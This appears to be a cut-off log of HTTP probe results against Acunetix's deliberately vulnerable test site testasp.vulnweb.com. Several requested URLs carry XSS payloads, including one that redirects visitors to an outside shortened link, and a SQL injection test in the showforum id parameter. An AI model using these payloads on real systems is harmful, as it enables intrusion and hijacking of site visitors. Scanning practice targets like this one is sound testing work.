Server\"],\"words\":328,\"lines\":44,\"status_code\":200,\"content_length\":3182,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.161535131Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E\",\"time\":\"345.318333ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.237389526Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch==%3Cscript%3Elocation.href=%22http://goo.gl/z4LTEG%22;%3C%2Fscript%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch==%3Cscript%3Elocation.href=%22http://goo.gl/z4LTEG%22;%3C%2Fscript%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch==%3Cscript%3Elocation.href=%22http://goo.gl/z4LTEG%22;%3C%2Fscript%3E\",\"time\":\"343.603225ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":327,\"lines\":44,\"status_code\":200,\"content_length\":3209,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.322276671Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=Mert\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=Mert\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=Mert\",\"time\":\"343.923657ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":327,\"lines\":44,\"status_code\":200,\"content_length\":2964,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.608071311Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=MertXSS\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=MertXSS\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=MertXSS\",\"time\":\"349.199582ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":327,\"lines\":44,\"status_code\":200,\"content_length\":2973,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.631595809Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfsearch=a\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfsearch=a\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfsearch=a\",\"time\":\"356.213068ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":327,\"lines\":44,\"status_code\":200,\"content_length\":2955,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.647197416Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Templates/Login.asp?RetURL=%2FTemplates%2FMainTemplate%2Edwt%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Templates/Login.asp?RetURL=%2FTemplates%2FMainTemplate%2Edwt%2Easp%3F\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Templates/Login.asp?RetURL=%2FTemplates%2FMainTemplate%2Edwt%2Easp%3F\",\"time\":\"352.691943ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.654868882Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Templates/Register.asp?RetURL=%2FTemplates%2FMainTemplate%2Edwt%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com/Templates/Register.asp?RetURL=%2FTemplates%2FMainTemplate%2Edwt%2Easp%3F\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Templates/Register.asp?RetURL=%2FTemplates%2FMainTemplate%2Edwt%2Easp%3F\",\"time\":\"343.975324ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.659731908Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Templates/MainTemplate.dwt.asp\",\"input\":\"http://testasp.vulnweb.com/Templates/MainTemplate.dwt.asp\",\"title\":\"Untitled Document\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Templates/MainTemplate.dwt.asp\",\"time\":\"356.833701ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":228,\"lines\":36,\"status_code\":200,\"content_length\":2488,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.671259731Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Templatize.asp\",\"input\":\"http://testasp.vulnweb.com/Templatize.asp\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Templatize.asp\",\"time\":\"350.699016ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.678023952Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/avatars/3\",\"input\":\"http://testasp.vulnweb.com/avatars/3\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/avatars/3\",\"time\":\"340.273384ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.677813255Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Templatize.asp?item=html/about.html\",\"input\":\"http://testasp.vulnweb.com/Templatize.asp?item=html/about.html\",\"title\":\"Untitled Document\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Templatize.asp?item=html/about.html\",\"time\":\"349.836812ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":506,\"lines\":66,\"status_code\":200,\"content_length\":4594,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.683731993Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/avatars/2\",\"input\":\"http://testasp.vulnweb.com/avatars/2\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/avatars/2\",\"time\":\"348.401799ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.68509786Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/avatars/1\",\"input\":\"http://testasp.vulnweb.com/avatars/1\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/avatars/1\",\"time\":\"352.677089ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.688226931Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/avatars/0\",\"input\":\"http://testasp.vulnweb.com/avatars/0\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/avatars/0\",\"time\":\"356.991421ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.700989288Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/avatars/noavatar.gif\",\"input\":\"http://testasp.vulnweb.com/avatars/noavatar.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/avatars/noavatar.gif\",\"time\":\"353.538523ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":11,\"lines\":8,\"status_code\":200,\"content_length\":950,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.701170449Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/campaign/adidas-x16\",\"input\":\"http://testasp.vulnweb.com/campaign/adidas-x16\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/campaign/adidas-x16\",\"time\":\"350.924792ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.707960709Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/html/about.html\",\"input\":\"http://testasp.vulnweb.com/html/about.html\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/html/about.html\",\"time\":\"341.017678ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":273,\"lines\":29,\"status_code\":200,\"content_length\":1995,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.713546915Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/favicon.ico\",\"input\":\"http://testasp.vulnweb.com/favicon.ico\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/favicon.ico\",\"time\":\"357.084405ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:55.985097263Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/robots.txt\",\"input\":\"http://testasp.vulnweb.com/robots.txt\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/robots.txt\",\"time\":\"344.98217ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":13,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.032927984Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/rpb.png\",\"input\":\"http://testasp.vulnweb.com/rpb.png\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/png\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/rpb.png\",\"time\":\"349.029182ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":40,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.101709251Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1);%20//\\u0026tfSearch=%3C/script%3E\",\"input\":\"http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1);%20//\\u0026tfSearch=%3C/script%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/search.asp?tfSearch=%3Cscript%3Ealert(1);%20//\\u0026tfSearch=%3C/script%3E\",\"time\":\"351.042462ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":394,\"lines\":44,\"status_code\":200,\"content_length\":4289,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.10553577Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1)\\u0026tfSearch=alert(2)%3C/script%3E\",\"input\":\"http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1)\\u0026tfSearch=alert(2)%3C/script%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/search.asp?tfSearch=%3Cscript%3Ealert(1)\\u0026tfSearch=alert(2)%3C/script%3E\",\"time\":\"366.399991ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":393,\"lines\":44,\"status_code\":200,\"content_length\":4289,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.115686117Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1);%20var%20x=[''\\u0026tfSearch=''];%3C/script%3E\",\"input\":\"http://testasp.vulnweb.com/search.asp?tfSearch=%3Cscript%3Ealert(1);%20var%20x=[''\\u0026tfSearch=''];%3C/script%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/search.asp?tfSearch=%3Cscript%3Ealert(1);%20var%20x=[''\\u0026tfSearch=''];%3C/script%3E\",\"time\":\"361.979432ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":395,\"lines\":44,\"status_code\":200,\"content_length\":4354,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.227473763Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/session\",\"input\":\"http://testasp.vulnweb.com/session\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/session\",\"time\":\"344.266199ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.41282048Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showforum.asp\",\"input\":\"http://testasp.vulnweb.com/showforum.asp\",\"location\":\"Default.asp\",\"title\":\"Object moved\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp\",\"time\":\"343.268156ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":9,\"lines\":3,\"status_code\":302,\"content_length\":132,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.474829471Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showforum.asp?id=1\",\"input\":\"http://testasp.vulnweb.com/showforum.asp?id=1\",\"title\":\"acuforum Weather\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp?id=1\",\"time\":\"347.074338ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":289,\"lines\":51,\"status_code\":200,\"content_length\":3077,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.476475205Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1--%5BTrue%5D\",\"input\":\"http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1--%5BTrue%5D\",\"title\":\"acuforum Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp?id=0+and+1=1--%5BTrue%5D\",\"time\":\"347.978827ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":310,\"lines\":51,\"status_code\":200,\"content_length\":3687,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.480723895Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showforum.asp?id=0\",\"input\":\"http://testasp.vulnweb.com/showforum.asp?id=0\",\"title\":\"acuforum Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp?id=0\",\"time\":\"357.103687ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":310,\"lines\":51,\"status_code\":200,\"content_length\":3619,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.481729299Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showforum.asp?id=2\",\"input\":\"http://testasp.vulnweb.com/showforum.asp?id=2\",\"title\":\"acuforum Miscellaneous\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showforum.asp?id=2\",\"time\":\"344.835867ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":284,\"lines\":51,\"status_code\":200,\"content_length\":2933,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.490539164Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp\",\"input\":\"http://testasp.vulnweb.com/showthread.asp\",\"location\":\"Default.asp\",\"title\":\"Object moved\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp\",\"time\":\"358.396578ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":9,\"lines\":3,\"status_code\":302,\"content_length\":132,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.52257816Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=0\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=0\",\"title\":\"acuforumMr.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=0\",\"time\":\"353.343697ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":291,\"lines\":46,\"status_code\":200,\"content_length\":3172,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.59828815Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=1\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=1\",\"title\":\"acuforumMr.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=1\",\"time\":\"352.751115ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":291,\"lines\":46,\"status_code\":200,\"content_length\":3058,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:56.668120016Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=10\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=10\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=10\",\"time\":\"340.595522ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:05.967913026Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=11\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=11\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=11\",\"time\":\"353.744706ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:05.987353541Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=12\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=12\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=12\",\"time\":\"349.278383ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.004435194Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=13\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=13\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=13\",\"time\":\"352.656007ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.005902052Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=14\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=14\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=14\",\"time\":\"343.418726ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 